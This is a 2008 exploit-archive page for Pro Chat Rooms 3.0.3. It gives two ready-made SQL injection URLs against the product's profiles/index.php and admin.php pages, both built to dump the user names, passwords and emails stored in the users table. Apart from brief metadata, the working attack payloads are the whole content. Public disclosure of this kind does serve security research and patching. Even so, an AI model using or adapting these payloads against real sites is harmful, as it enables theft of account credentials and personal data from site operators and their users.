[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pro Chat Rooms 3.0.3 (guid) SQL Injection Vulnerabilities
# Published : 2008-09-28
# Author : ~!Dok_tOR!~
# Previous Title : PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit
# Next Title : Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability


Author: ~!Dok_tOR!~
Date found: 28.09.08
Product: Pro Chat Rooms
Version: 3.0.3
Price: $55
URL: www.prochatrooms.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

Exploit 2:

http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

# www.Syue.com [2008-09-28]